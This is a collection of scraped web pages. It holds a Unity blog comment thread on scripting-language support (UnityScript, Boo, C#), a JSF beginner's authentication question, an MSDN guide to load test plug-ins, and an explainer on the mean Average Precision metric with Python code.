I'm no longer certain the place you're getting your info, however good topic. I must spend some time finding out much more or working out more. Thank you for fantastic information; I was looking for this info for my mission.
Meri · October 14, 2014 at 3:19 am

I've come across that nowadays, more and more people are being attracted to video cameras and the issue of digital photography. However, being a photographer, you will need to first devote so much time deciding the exact model of video camera to buy, as well as moving from store to store just so you could buy the lowest-priced camera of the brand you have decided to choose. But it doesn't end there. You also have to contemplate whether you should obtain a digital camera extended warranty. Many thanks for the good ideas I received from your weblog.

Clonkex · October 21, 2014 at 2:32 pm

How can you SAY that?! Javascript is WAY easier than C# and I would be forced to drop Unity if they dumped JS! I'm horrified that people think that way. It would take weeks for me to learn C# over JS.

Alberto · September 13, 2014 at 12:01 pm

Please, in Unity change the .NET framework so that we can write scripts against .NET Framework 4.5. This will allow us to have more advanced stuff.

Mark Hessburg · September 11, 2014 at 5:35 pm

I absolutely prefer UnityScript, and I am a paying customer and I work full time with Unity. I doubt the editor statistics will know if a C# script comes from the Asset Store. There are thousands of people using Unity like some WYSIWYG tool. Think of all the postings "Do I really need to learn coding to make a game in Unity?" or the success of tools like PlayMaker. A large portion of the Asset Store developers and PlayMaker use C#, hence the statistics will automatically be strongly biased due to people who do not script at all. I've been programming since 1982 and I don't want to use C# because I just don't like it; one reason why I'm using Unity is UnityScript.
A lot of the steps Unity took since I started using it in 2007 were often bad for the overall experience of Unity (especially the Free version, but the Windows Editor also flooded the forums with... well, let's say it in a more polite way: people who are disturbing the formerly great and useful experience you could have with the community). The Asset Store was a nice idea but results in mostly terrible assets for people who want to use things in a plug & play way; it often requires a lot of work to get rid of the annoying "useful stuff" first before you can really integrate it. But who cares? Just don't use it, just don't visit the forums too often, and it is OK. But now, when real features like support for different languages start to disappear, this is affecting me directly, and this is really a bad thing. The day you drop US is the day you will start losing my money - seriously.

3Dgerbil · September 11, 2014 at 3:25 pm

Please don't drop UnityScript, or I'll drop Unity... Shouldn't we realize that C is now a 30-year-old dinosaur that has been patched and repatched to handle OOP? Even Apple started the path of abandoning C by introducing Swift... 30 years is an enormous time in the computing world; would you cross the Atlantic on a piston-engine aircraft just because you're used to it?

Jashan Chittesh · September 11, 2014 at 12:40 am

Great move, and thank you for sharing the statistics. So it seems that UnityScript lost a lot of popularity in recent times - in my poll that was started Feb 29, 2009 and is still ongoing, it's still 53% (see also: ... unfortunately, it got severely broken by the new forum software :-( ). Personally, I think UnityScript is not a language anyone should use, but as long as it doesn't consume a lot of resources, I don't mind having it around (as long as no one wants me to use it ;-) ).

Clonkex · October 21, 2014 at 2:35 pm

Now what's wrong with UnityScript? It's easily as good as C# and way easier to use.
Paul · September 9, 2014 at 2:44 am

I think it's totally wrong, because I'm a Boo user, and it is a brilliant language; moreover, for developers who use Python it becomes easier to pick up Unity 3D. I have projects 100% in Boo and my developer team only works with Boo. Boo has this low percentage because it is being ignored by Unity itself; they don't promote it, say nothing about Boo, only C# and sometimes JS (UnityScript), and because there is no community support around Boo, this language is more difficult to learn. However, I will make a Boo package for Unity 5 for support in Boo.

Nathaniel Sabanski · September 8, 2014 at 7:24 pm

Community supported documentation is a great idea. It has proven to work very well for communities such as PHP (say what you will about the language, but it arguably has some of the most useful technical docs of any community). I would be more than happy to contribute Boo documentation for Unity APIs I happen to use... preferably if contributions have upvote/downvote or are integrated (for quality control).

Jamie · September 8, 2014 at 5:38 am

@boaz, community supported documentation would be superb. I'd happily help contribute to the Boo documentation. And it'd be a shame to see the hard work of documenting Boo through the 4.x cycle tossed away.

Boaz · September 7, 2014 at 11:43 pm

I also resonate with better C# documentation and examples for all of Unity's features. However, I think it's a shame to drop Boo. Right now Boo is going through a vicious cycle: not enough documentation -> not enough users, and so forth. Please consider leaving Boo in, and opening the official Unity documentation to community support. When we have complete C# documentation, the community can easily translate everything to Boo.

Peter Dwyer · September 7, 2014 at 1:31 pm

On the subject of scripting: can we get a quick blog on the state of the universal asset bundles?
I believe 5.0 is supposed to introduce asset bundles that don't become useless when Unity versions change. Is this still the case?

Dorin GRIGORE · September 6, 2014 at 4:47 pm

Very good! I use C# and I'm a professional web/JS developer. I prefer C# in Unity.

Pedro · September 6, 2014 at 4:39 pm

I really love Javascript, and it is easy to learn! ;)

BeliarTheEvil · September 6, 2014 at 5:12 am

@Jim Preston: I agree that Python is a superior language. I've been a Python coder for years and, besides agreeing with some criticism and limitations, overall it's MUCH better than pretty much any language out there imho. The problem with Python is performance; that's why I advocate Cython over Python for anything real-time. With Cython you can "compile" Python code into C binaries, which per se are much faster than the same thing running interpreted in CPython, but the real power of Cython is that simply by declaring some C types you get incredible performance. Last benchmarks I did, it was much faster than Mono on Linux, getting very close to hand-written C++ and Java. And a very good thing is that the source protection is actually decent, because there's no way someone can get back the Python code from the C binaries generated by Cython; in fact, even the C code is pretty much unreadable... I wonder what kind of binary that code generates when compiled with optimizations and stuff. The problem with Cython is that somehow that amazing piece of software is unknown... Plus people are ignorant about its features and amazingness. A very nice thing is that you can simply program in standard Python, which works just as fine in Cython, and optimize only the performance-critical code by adding some "cdefs" here and there. So, basically, menus and other stuff would be standard Python and the only things to be optimized are the ones that run in updatexxx. I can't imagine the productivity boost... Of course that's never gonna happen, and C# isn't a terrible language IMHO.
Jim Preston · September 6, 2014 at 1:38 am

We're moving to Python 3.x for web dev. Python is growing in popularity. JavaScript and PHP are limited. C# is like driving an old truck unless that's all you do in life. Please think about how many users you would pick up with Python. It has far more different use cases than many other languages.

Jamie · September 6, 2014 at 1:10 am

I understand the rationale, but am saddened to see Boo losing official support. It was only in 4.x that Boo actually got reasonable documentation - which is why I suspect it lagged behind the other languages in popularity. It's a shame to see it being somewhat dropped - it made bouncing from Python at work to Boo in the evenings fairly easy.

Taugeshtu · September 5, 2014 at 12:44 pm

@"And no, you won't write scripts faster or easier in JS/Boo."

Have you actually tried writing code in Boo yourself? And not in a "well, I have 5 minutes to spare, let's try this" way. I bet you didn't. Boo pros compared to C#:

Indexed properties: MyClass.Stats[StatsEnum.Strength] = 5

Direct access to Vector fields in transforms: transform.localPosition.x = 0

Pain-free dynamic typing: x as duck = "I'm a string now, but I can be anything!"

Who needs structs to return multiple parameters from a function?

def Some( x as int ) as (int):
    return x, x*2, x*4
...
x, y, z = Some( 2 )

Array/list comprehension is somewhat debatable given C#'s LINQ, but generally, when you know what you're doing with Boo, you do write faster with it. There are problems, of course, mostly caused by Unity compiling C# and Boo separately. Therefore Boo isn't something I'd go with for production. But it's an exceptional dose of fun when I just want to make something for myself. Boo makes programming fun again. Shame Unity decided to even produce UnityScript; we could've had 20% of people using Boo now...

Clonkex · October 21, 2014 at 2:38 pm

If Unity had not created UnityScript, I would not be using Unity today, and neither would 18.9% of their current users.
A*September 5, 2014 at 12:19 pm Hi, JS is easier than C#, but C# is a “real” language supported and used widely, more powerful, versatile, and feels natural with unity with a lot of features. However learning it is not as easy as JS, so this is the point. #####I want to Unity to provide for beginners C# learning tutorials at least to get them started in using unity##### charles lSeptember 5, 2014 at 7:11 am I use unityScript java,, and i need to use unity 3d with. I have misery with c# and boo. Please keep US ! atoi2008September 5, 2014 at 5:58 am I know java, and I find US confusing. In Java I can initialize my variables using public int or private bool. In US I’m a little lost on the syntax with the colon in there and it doesn’t feel like Java at all to me. C# seems more familiar, almost exactly like Java in my opinion and why I prefer to use it. artemisartSeptember 4, 2014 at 8:15 pm Would it be possible to support languages such as F# or Nemerle ? or provide support for custom compilers ? shetstormSeptember 4, 2014 at 8:07 pm The best thing Unity can do before killing JS and Boo is to provide a JS/Boo 2 C# script converter. As for syntax, come on, it’s almost identical. And no, you won’t write scripts faster or easier in JS/Boo. ClonkexOctober 21, 2014 at 2:41 pm I can’t speak for Boo as I’ve never looked at it, but JS/US? Yes, yes I do write scripts far quicker and much easier than C#. C# feels heavy and messy and I simply don’t like it. GOBLA GamesSeptember 4, 2014 at 6:21 pm ok i totally agree with removing boo language from unity editor but you have to support java script also plus c# i am one of developers who work with 2 languages in one project if you have 20 people work using c# and 8 people work using Jscript that is not mean to just support the 20 peoples you have to give the other their rights for learn in improve their self BeliarTheEvilSeptember 4, 2014 at 4:06 pm Hey there… It was about time to dump Boo imho. 
Sometimes I wish Unity had only C# to begin with, that way I wouldn’t be able to choose JS for my games (worst decision ever) which seriously lacks a decent editor… I never had real problems doing stuff with a mix of 3rd-party C# code and my own JS code, however, when I need to code in C# it’s so much better… Monodevelop in it’s utter stupidity, actually helps you code, while in JS it goes breaking your code as you type, unless you completely disable the code helpers, in which case it turns into something like a broken Windows 3.1 notepad. Code helpers are really helpful so you don’t have to keep the entire docs in your mind, however, you have to hit ‘esc’ all the time because MD is so dumb and you also have to hit ‘ctrl+z’ lots and lots of times when it change your code to something incredibly stupid. I just wish MD had ‘non-intrusive’ code completion and helpers, something that just shows you the help but doesn’t change your code without you asking it to do that. It’s extremely frustrating when you go back to Unity and sees a lot of errors because MD broke your whole code. I’m not even saying that all the pads don’t work for JS… you don’t even have a code outliner, if you need to quickly find a function, there’s no easy way to do that, the fastest way is to hit the hotkeys for ‘find’ or ‘find in all files’ and type the function, which is a little bit better than windows 3.1 notepad. I keep wondering… if people use UnityVS because according to them MD sucks for C#, and compared to the JS support, MD is a dream to program in C#, I wonder how they would rate MD for JS… I mean, we’re using the “sh*t of the sh*t” :D hahaha. I really like JS, it’s so much simpler than C#, however, due the lack of a decent editor, I’m planning to dump JS asap and go for C#, perhaps I will even sign up for bizspark (or something) to use UnityVS instead, which seems to be the most decent editor for Unity scripts. 
LunarcloudSeptember 4, 2014 at 2:52 pm I’m a full-time Javascript / HTML5 developer and had to stop using UnityScript because it’s just *NOT* the Javascript I’ve come to love. It’s missing too much. It’s too weird. To help the context switch, and use a stronger game-making language, I use C# TilesSeptember 4, 2014 at 1:10 pm Uniscite is still my favourite. For downloading Uniscite, just download an older Unity version before version 4 ( I think they removed Uniscite with 4.3, but am not sure). And grab Uniscite from there. I also never understood why people wants to remove a language at all. It makes Unity less powerful. I still vote for even more languages, not fewer. Dropping existing languages is not good. Even in the case of BOO it removes quite a few users from the list. I doubt that dropping the support for BOO will even play in the costs for those now lost users. And it increases the fear that JS is the next language to be dropped. This has something to do with trust. And so it is not really a clever move. And there just IS a difference between C# and JS, which really makes a difference. Ralph HauwertSeptember 4, 2014 at 2:04 pm We absolutely don’t mean to erode your trust, which is also why we are making these very soft changes. As for more languages; you actually illustrated the problem if we do that today; as we start supporting a language, the expectation is that we will keep on supporting it for at least an x amount of time for a y amount of users. For that simple reason, both addition and removal are things that we have to very carefully consider. As I’ve mentioned, we have loose thoughts on for example pluggable language support, but no real plans today. NothanksOctober 27, 2014 at 9:41 am Horrible idea. Maintaining a language takes time. Every language that they have to maintain takes time away from actual development of new features. 
VectrexSeptember 4, 2014 at 12:48 pm All I ask is that the { brace be on the NEXT line :) Including the ‘create new C#’ template. You wouldn’t believe how much that confuses my students. Ralph HauwertSeptember 4, 2014 at 2:04 pm You are asking for a change in the default template for C# monobehaviours ? Sinister MephistoSeptember 4, 2014 at 12:12 pm About time. dasdSeptember 4, 2014 at 10:53 am I wanna use C++ do they have it? LOL user13September 4, 2014 at 8:35 am Please give download link for UniScite, or include it in future version of the software, it’s good enough for those who want UnityScript, Mono is slow in my Computer. Ofc I could just get it from old version of unity, but those are big downloads just for the small 1/2 mb editor.. i hope i am not the only one who wants UniScite. Or anyway, just a download link in the comment, will be enough too.. Thanks Ralph HauwertSeptember 4, 2014 at 2:06 pm You can get UniScite from older versions of Unity, but we don’t do actual support on it anymore. Sebastian KSeptember 4, 2014 at 7:44 am I really hope this is not a step towards removing Boo entirely… I use it for the vast majority of my projects. It rocks! I also do not understand how people can argue FOR removing languages… Why would you want to make Unity less powerful? Not everyone wants to work in C#. They pretty much get Boo support for free under Mono. The ability to select your language is a unique and awesome feature of Unity, whether it be Javascript, C# or Boo. Experienced users shouldn’t have much trouble referencing the API regardless of samples… but that sucks for newcomers! Removing the shortcut to “Create Boo Script” feels like a step towards removing the language… I genuinely hope not! Ralph HauwertSeptember 4, 2014 at 1:47 pm Sebastian, as you can see Boo is still there in 5.0, but we are remove buttons and docs.
We are following our stats on this and subsequently following our users in terms of on what work we put resources. ChristopherSeptember 4, 2014 at 7:17 am I love this, but I think dropping Boo all together would be a better move. It is rarely used by anyone and maintaining support for it consume resources. Ralph HauwertSeptember 4, 2014 at 1:48 pm UnityScript relies on Boo; for us to remove compiler support for something that is there either way would be unnecessary. WANSeptember 4, 2014 at 4:34 am I prefer unity script, because I’ve been doing web development with javascript, I’m more familiar with it than C#. I will continue using it as long as it is supported. koblaviSeptember 4, 2014 at 3:43 am Nice Move, sounds fair. I just think this should have been done 3 years ago. Looks like the language itself is a self-fulfilling prophecy (Boo has just been ‘Booed’ of stage) :-P. I agree with the notion that Unity should eventually move towards official support for only C# both in terms of documentation and examples. UnityScript and C# are just too similar. Besides, C# has cleaner syntax and is more widely supported even outside of the unity community. Finally (and I have said this before in a previous post) Unity should work on allowing language bindings for other Languages that are not officially supported by unity but compile to IL (without the DLR parts). Unity already supports other languages (sort of) as long as you drop the compiled DLL into the editor and not the source. It would just be nicer if you could just double click source and edit & drag and drop just about any .NET language in the editor provided you have the necessary binding module installed :-) . Sure it entails a bit of work. 
But it will really be nice if you can tell developers that they can use any .Net language to write scripts in Unity Ralph HauwertSeptember 4, 2014 at 1:50 pm The idea of pluggable languages is something we are thinking about, but we currently have no solidified plans in that direction. I do feel it does generally make sense though, but again, no solidified plans to put effort in that today. BobOctober 17, 2014 at 5:47 pm The lack of pluggable languages is the only thing holding me back from using Unity. I think, anecdotally, that there are many programming teams out that that just can’t swallow the idea of being locked into a particular language like C#, or worse, a kinda-javascripty language that doesn’t really function the same as what everybody already knows. Unity really is an outlier in this sense, the standard practise is to provide API bindings and let the community do the heavy lifting. YoyoSeptember 4, 2014 at 2:05 am please don’t drop javascript/UnityScript unless you intend to replace it with a built-in Blueprint-type of visual language . As a beginner I find Unityscript easier to deal with than C# Ralph HauwertSeptember 4, 2014 at 1:54 pm Have a look at the Unite 2014 – Keynote video, in which Lucas is showing a sneak peek at a research project that has been going on; HeliosDoubleSixSeptember 4, 2014 at 12:08 am Now just get rid of UnityScript so you can add fully concnetrate on proper editor inspector support and serialization for all the C# things such as Dictionaries, Interfaces / Polymorphism and so on…. till then FullInspector ho! ChillersanimSeptember 3, 2014 at 10:58 pm Apart from the discusion whether to use US or C#, I would also like to remark something about the documentations. As it is now, most components are quite good documented. But subparts like enums and stuf are not yet documented. You can’t see which value does what for example. 
Also I would really like it, if I could see somewhere which features are available in which Unity versions. It would help a lot by making assets backward compatible. Thanks Ralph HauwertSeptember 4, 2014 at 1:56 pm Good points, I’ll let Aleks comment on this. As for “assets backwards compatible”; I’m not sure what you are asking for; however, for 5.0 we are planning to ship with something to call the script updater, that does it best to update your projects code to conform with new / changed api’s. Emil "AngryAnt" JohansenSeptember 3, 2014 at 10:34 pm @Nathaniel Given the size of the community and even a pessimistically low guesstimate of the sample size used to generate the division referenced in the post, do you honestly believe that the number of entirely closed projects you refer to could significantly change the percentages? Undoubtably the departure of Rodrigo has reduced the internal amount of support for Boo. However he was one awesome dude in a large and still growing company. Again, a simple look at those figures would, at least to me, convey that one strong advocate for or against would not do much to change the outcome. @Nikko If C# were a proprietary language, do you really think that Unity would have dared to rely on Mono for scripting for so long? Or for that matter that any of the larger companies licensing Unity would dare to do so? Personally, I can’t really fault Unitys logic behind this move. However I am very much hoping to see a pluggable compiler pipeline at some point and looking forward to the kind of community projects that would sprawl around such a feature. Peter DwyerSeptember 3, 2014 at 10:16 pm @Nathaniel to be fair to unity. They dropped Boo because it’s simply not used in anywhere near the amount of volume as either UnityScript or C#.
Just from personal experience I have never met one person who used Boo and I move in both the Indie and AAA circles regularly. Nathaniel SabanskiSeptember 3, 2014 at 10:10 pm I think this is a mistake. Boo is a brilliant language for pro Unity people and can drastically increase the expressiveness of your code VS number of lines written. There are probably entire closed source games not being counted in the ratio above. Probably has something to do with Rodrigo leaving? Ralph HauwertSeptember 4, 2014 at 1:57 pm The stats come from the editor, so closed source wouldn’t mean much for the statistic. The reason why we are doing this is because we are following where are users are going and generally allocating resources where they are most wanted and effective; with boo having low numbers like this, not having it as a first class citizen is in my opinion more honest in reflecting that. ChrisSeptember 3, 2014 at 9:53 pm I converted my project from Unityscript to C# and haven’t looked back. Apologies for the shameless plug, but for anyone interested, the converter I created to do this is available on the Asset Store:. …It goes as far as I think you can to make conversion of a complete, live project as simple as possible. Richard FineSeptember 3, 2014 at 9:46 pm @NIKKO: “C# is Microsoft and they have not yet published in public domain.” Uh, yes they did, from C# 1.0 – as ECMA-334, the same standards body that Javascript is published with. NikkoSeptember 3, 2014 at 8:40 pm Javascript is an open source language, independent form any corporate power, C# is Microsoft and they have not yet published in public domain. Microsoft has a long pattern at changing technology every 10 years, it is their business model. Remember Visual Basic, MFC, ASP, just to name a few. I would not rely on C# at all. 
C++ should be pushed as it is an universal language that everyone can learn at School and is not dependent on Microsoft business strategy… Richard FineSeptember 3, 2014 at 8:26 pm Yeah, I wouldn’t worry about UnityScript, it’s not going anywhere. And as people have noticed, while UnityScript is around, Boo will pretty much always continue to *work* as it’s what powers UnityScript on the back end… For people interested in the language converter tools, have you already seen things like ? Juan SebastianSeptember 3, 2014 at 8:08 pm funny thing is Unityscript compiler is made on Boo lol. Gabriel CesarSeptember 3, 2014 at 7:37 pm Why not trade for Boo Python? We would have more support from the developer community. ;) Andy MartinSeptember 3, 2014 at 7:09 pm It’s time for Boo to go. I’m a bit surprised though. At Unite, I heard several times how proud they were to support all 3 languages. There is no need to waste resources showing Boo documentation though. Christopher HagerSeptember 3, 2014 at 7:02 pm @Matthew Radford Don’t worry for a long while. They’re dropping Boo because less than a percent of Unity3D users use it. JavaScript (or UnityScript as I just learned. Yay, I’m still a bit of a newbie) has a good following of 20%, or 1 out of every 5 developers. Dropping JavaScript now (or in the near future) would be a lost for the company. I personally use C# (cause that’s the one I know how to use… to an extent) and am glad that they’re refocusing their setups to C#. But it would also be nice if they provided the UnityScript for every C# script they will display. That way I can better see the difference between the two languages for myself. And I’m not saying C# is better. It’s just the one I know the best.
Adams ImmersiveSeptember 3, 2014 at 7:00 pm As long as UnityScript stays around (given that it’s most similar to the non-Unity JavaScript web coding I do) I’m happy! I’d like to see more UnityScript examples added as well: some pages have no example at all. Alberto FonsecaSeptember 3, 2014 at 6:44 pm This is great news and I’m glad to see the use of analytics to direct resources to areas where they’ll have the most impact for users. I for one would love to see the C# docs contain more examples across the board so this is great.
AdamSeptember 3, 2014 at 6:37 pm The differences between Unity’s “JavaScript” (UnityScript) and C# are very very small. Most code can be shared unaltered between the two languages. I agree with Robert that one can learn the differences between UnityScript (US) and C# in an afternoon, and it will be second nature before the week is out. Having cut my teeth with Unity using Unity’s JS (and coding in Unitron!), then moving to C# to be more compatible with 3rd party add-on’s like EZGui, the transition was very easy. To people with a background in the real JS, C# may seem intimidating, and the apparent similarities of syntax between JS and US may be comforting, but they mask the fact that US is pretty much C# in JS clothing. I think it’s a great thing that we can still code in C#, US & Boo, I think it makes sense for Unity Technologies to concentrate on just one language, and I’m on the +1 wagon to officially change the name of the language to UnityScript. Matthew RadfordSeptember 3, 2014 at 6:26 pm Oh man… I’m a bit concerned Javascript is going to be removed.. I’ve grown quite fond of it. I think one if the best Features for me about Unity Script is how simple it is. I’m always talking to other unity users I hang out with and they seem to be constantly trying to figure how to do THIS or THAT in C#. Using Unity Script I don’t think I’ve ever once thought about the language, only the API. Please don’t switch to C++ for everything like Unreal. Sure the graphics guys need it, but the rest of us don’t. Phil WinkelSeptember 3, 2014 at 6:09 pm unity script is just annoying, unless you’re doing your entire project in unity script. If you try to mix unity script with C# you run into all these ridiculous issues with order of compilation, trying to reference unity script stuff in C#, etc. Plus, like mentioned above, it’s often referred to as javascript when it’s not even really javascript. I think it should probably just be referred to as unity script across the board. 
Should probably just transition to C# and focus 100% of resources on that. If you can automatically generate UnityScript from C# that’s great. Don’t waste any time on UnityScript though. It’s more beneficial to learn C# (a real programming language you can do other development with) than to learn UnityScript, some weird version of javascript that you can only use for unity development. Down with UnityScript! Robert CummingsSeptember 3, 2014 at 5:29 pm Considering JS requires Boo internally, this is just a surface change. People can still write in js and boo, but the long term future should be that they are removed and people can just plug in a language of choice for example Lua bindings or such. The core of Unity should be just pure c# and hopefully (C++). This means everyone wins, especially since Unity wouldn’t have to burn resources on a tiny minority. Oh, and learning C# from JS takes about a day, if just sticking with what js can do. No excuses, it is time, and it’s happening. Start the migration today and you’ll get an internet’s worth of C# code and resources you can use. gakakiSeptember 3, 2014 at 5:09 pm i like javascript (but not static type javascript in unity ) and lua , because they are simple and can be hot updated Anthony MaddenSeptember 3, 2014 at 4:42 pm I really hope you guys don’t get rid of unityscript. All of my games I’ve released are in US and it would suck to have to start scripting in C#. I do know how to script in C# but its soooooo much faster to prototype using unityscript. martySeptember 3, 2014 at 4:24 pm Any chance those C#->US and US->C# conversion tools will ever be shared with the community? DallonFSeptember 3, 2014 at 3:59 pm Suggestion: please change all instances of “JavaScript” in the editor and and documentation to “UnityScript”. The true JavaScript language is evolving and the distinction between modern JavaScript and UnityScript is becoming increasingly prominent. 
Plus it would help reduce the confused newbies on the forums who bought a Java book hoping to learn Unity scripting. Frederico ZveiterSeptember 3, 2014 at 3:40 pm Fair enough. ColbySeptember 3, 2014 at 3:23 pm Makes sense to me. I was kinda figuring it was only a matter of time til boo was dropped. Awesome about C# and I friggen can’t wait for Unity 5! Wilson KoderSeptember 3, 2014 at 3:17 pm Will the C#-UnityScript converter be available to the public? And I have to do this, first! aleksandrSeptember 4, 2014 at 12:20 pm Thank for your feedback. There is currently no plan to make the C#=>US converter public.
https://blogs.unity3d.com/2014/09/03/documentation-unity-scripting-languages-and-you/
Please help - JSF newbie question on user authentication

I am working on an online tutorial where in my POJO I am trying to acquire the userID value to display on my webpage. I am working in Eclipse and I put a breakpoint in my bean but I never get there. Here is the code I'm using and any help/direction would be greatly appreciated:

package org.texashealth.transfer.user;

import javax.servlet.http.HttpServletRequest;
import javax.faces.bean.*;

@ManagedBean
public class User {

    private String userID;

    public String getUserID() {
        return userID;
    }

    public void setUserID(String userID) {
        this.userID = userID;
    }

    public String authenticate(HttpServletRequest request) {
        userID = request.getRemoteUser().substring(6);
        return userID;
    }
}

In the JSP page I have the following:

JSF Test Form
Here is the userID:
Some random data:
Some other data:

I also tried modifying my getUserID method above to use a FacesContext method but still got a NULL value:

    public String getUserID() {
        userID = FacesContext.getCurrentInstance().getExternalContext().getRemoteUser();
        return userID;
    }

Forgot to add additional code change made for other's info.

Message was edited by: savoym

I resolved my problem.
https://www.java.net/node/705085
How to: Use the Load Test API

This topic applies to Visual Studio Ultimate.

Visual Studio Ultimate supports load test plug-ins, which can control or enhance a load test. Load test plug-ins are user-defined classes that implement the ILoadTestPlugin interface found in the Microsoft.VisualStudio.TestTools.LoadTesting namespace. Load test plug-ins allow for custom load test control, such as aborting a load test when a counter or error threshold is met. Use the properties on the LoadTest class to get or set load test parameters from user-defined code. Use the events on the LoadTest class to attach delegates for notifications when the load test is running. You can also create plug-ins for Web performance tests. For more information, see How to: Create a Web Performance Test Plug-In and How to: Create a Request-Level Plug-In.

To use the LoadTesting namespace:
1. Open a Test Project that contains a load test. For more information, see Creating and Editing Load Tests.
2. Add a Visual C# or a Visual Basic class library project to your test solution.
3. Add a reference in the test project to the class library project.
4. Add a reference to the Microsoft.VisualStudio.QualityTools.LoadTestFramework DLL in the class library project.
5. In the class file located in the class library project, add a using statement for the Microsoft.VisualStudio.TestTools.LoadTesting namespace.
6. Create a public class that implements the ILoadTestPlugin interface.
7. Build the project.
8. Add the new load test plug-in using the Load Test Editor: right-click the root node of the load test and then click Add Load Test Plug-in. The Add Load Test Plug-in dialog box is displayed. In the Properties for selected plug-in pane, set the initial values for the plug-in to use at run time.
9. Run your load test.

For an implementation of ILoadTestPlugin, see How to: Create a Load Test Plug-In.
https://msdn.microsoft.com/en-us/library/ms182605(v=vs.100).aspx
If you have ever worked on an Object Detection, Instance Segmentation, or Semantic Segmentation task, you might have heard of the popular mean Average Precision (mAP) Machine Learning (ML) metric. On this page, we will:

- Cover the logic behind the metric;
- Find out how to interpret the metric’s value;
- Present a simple mean Average Precision calculation example;
- And see how to work with mAP using Python.

Let’s jump in. To define the term, mean Average Precision (or mAP) is a Machine Learning metric designed to evaluate Object Detection algorithms. To clarify, nowadays, you can use mAP to evaluate Instance and Semantic Segmentation models as well. Still, we will not talk much about these use cases on this page, as we will focus on mean Average Precision for Object Detection tasks. From the mathematical standpoint, computing mAP requires summing up the Average Precision scores across all the classes and dividing the result by the total number of classes. Still, it is not that easy. In Object Detection-related papers, you can face such abbreviations as mAP@0.5 or mAP@0.75. In short, this notation depicts the IoU threshold used to calculate mAP. Let’s check out how it works.

- If we set the IoU threshold at 0.9, then Precision is equal to 16%, as only 1 out of 6 predictions fits the score;
- If the threshold is 0.71, then Precision is 66.67%, because 4 predictions are above that score;
- And if the threshold is 0.3, then Precision rises to 100%, as all the predictions have IoU above 0.3!

So, the IoU threshold can significantly affect the final mean Average Precision value. This dependency introduces variability to a model evaluation. This is bad because there can be a scenario when one model performs well under one IoU threshold and massively underperforms under another. Data Scientists identified this weakness. They wanted the evaluation metric to be as robust as possible.
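The effect of the IoU threshold on Precision can be reproduced in a few lines of Python. The IoU values below are made-up numbers chosen to match the example above (1 of 6 predictions above 0.9, 4 above 0.71, all above 0.3):

```python
# Hypothetical IoU scores for six detections, each matched to a ground-truth box.
ious = [0.95, 0.86, 0.82, 0.76, 0.56, 0.41]

def precision_at_iou(ious, threshold):
    # A prediction counts as a true positive only if its IoU clears the threshold;
    # everything below the threshold becomes a false positive.
    true_positives = sum(iou >= threshold for iou in ious)
    return true_positives / len(ious)

for threshold in (0.9, 0.71, 0.3):
    print(f"IoU threshold {threshold}: precision = {precision_at_iou(ious, threshold):.2%}")
```

Raising the threshold from 0.3 to 0.9 drops Precision from 100% to about 16.7% without a single prediction changing, which is exactly the variability the metric's designers wanted to smooth out.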
So, they suggested measuring Average Precision for every class and every IoU threshold first and then calculating the average of the obtained scores. The picture above shows Precision-Recall curves drawn for 4 IoU thresholds for three different classes. In the example, the IoU threshold of 0.9 is the most stringent (as at least 90% overlap between the predicted and ground truth bounding boxes is required), and 0.6 is the most lenient. As you can see, the difference between each IoU threshold value is 0.1. This measure is called a step. So, the abbreviation mAP@0.6:0.1:0.9 means that the mAP was calculated for each IoU threshold in the range [0.6, 0.7, 0.8, 0.9] and each class. Then the obtained values were averaged to get the final result. Noteworthy, in the popular Common Objects in Context (COCO) dataset, mAP is benchmarked by averaging it over IoUs from [0.5, 0.95] in 0.05 steps.

To calculate mAP:
1. Define the IoU thresholds;
2. Compute the Average Precision score for each IoU threshold for a specific class;
3. Calculate the mean Average Precision value for the given class by summing up the scores from step 2 and dividing them by the number of IoU threshold values;
4. Apply steps 2 and 3 to all the classes;
5. Sum up the obtained mAP scores and divide them by the total number of classes to get the final result.

Since mAP is calculated across multiple Precision-Recall curves, the best-case scenario is when both Precision and Recall at every IoU threshold are equal to their best possible value – one. However, such a case is a fantasy, so you should stay realistic and expect a significantly lower metric value. Noteworthy, it is complicated to provide unified mAP benchmarks that would suit any Object Detection problem, since there are too many variables to consider, for instance:
- the number of classes;
- the expected tradeoff between Precision and Recall;
- the IoU threshold, etc.

The truth is that, based on the task, the same metric value might be both good and bad.
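The five-step recipe described earlier on this page can be sketched in a few lines of Python. The Average Precision numbers here are invented purely for illustration:

```python
# ap_scores maps class name -> {IoU threshold: Average Precision at that threshold}.
# The class names and AP values are made up for the sake of the example.
ap_scores = {
    "cat": {0.6: 0.9, 0.7: 0.8, 0.8: 0.7, 0.9: 0.6},
    "dog": {0.6: 0.7, 0.7: 0.6, 0.8: 0.5, 0.9: 0.4},
}

def mean_average_precision(ap_scores):
    # Steps 2-3: average the AP values over the IoU thresholds for each class.
    per_class = [sum(by_iou.values()) / len(by_iou) for by_iou in ap_scores.values()]
    # Steps 4-5: average the per-class values over all classes.
    return sum(per_class) / len(per_class)

print(mean_average_precision(ap_scores))
```

Here "cat" averages to 0.75 and "dog" to 0.55 across the four thresholds, so the final mAP is 0.65.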
So, if you spend some time identifying the desired value for your case and estimating your goals and resources, it will benefit you greatly. Nevertheless, the SOTA (State-of-the-Art) mAP for the Object Detection task on the COCO dataset's test part is currently 63.1. As you can see, SOTA is relatively low. Still, it does not mean you should stop if you see a similar value in your task. From our experience and the research conducted when writing this page, if your task does not include millions of classes and your IoU threshold is set to 0.5, you should reach at least 0.7 mAP before you are more or less satisfied with the model's performance. To summarize, if your Object Detection task is not similar to COCO, you should not bother that much about SOTA and should try to achieve 0.8 mAP at the 0.5 IoU threshold before calling the job done. Also, do not trust the metric alone; always visualize the model's predictions to ensure your solution works as intended. For this page, we decided to be more advanced and prepared a Google Colab notebook featuring a mean Average Precision calculation in Python on a simple example. We used the formal Average Precision and mean Average Precision formulas, NumPy and Sklearn functionality, and some imagination. If you want a well-commented yet simple example of computing mean Average Precision in Python, check out this example. The mean Average Precision score is widely used in the industry, so Machine and Deep Learning libraries either have their own implementation of this metric or can be used to code it quickly. For this page, we prepared three code blocks featuring mAP calculations in Python. In detail, you can check out:

- mean Average Precision in NumPy;
- mean Average Precision in TensorFlow;
- mean Average Precision in PyTorch.

import numpy as np

def apk(actual, predicted, k=10):
    # This function computes the average precision at k between two lists of items.
    if len(predicted) > k:
        predicted = predicted[:k]

    score = 0.0
    num_hits = 0.0
    for i, p in enumerate(predicted):
        # Count a hit only the first time an item appears among the predictions
        # (standard ml_metrics-style implementation).
        if p in actual and p not in predicted[:i]:
            num_hits += 1.0
            score += num_hits / (i + 1.0)

    if not actual:
        return 0.0

    return score / min(len(actual), k)

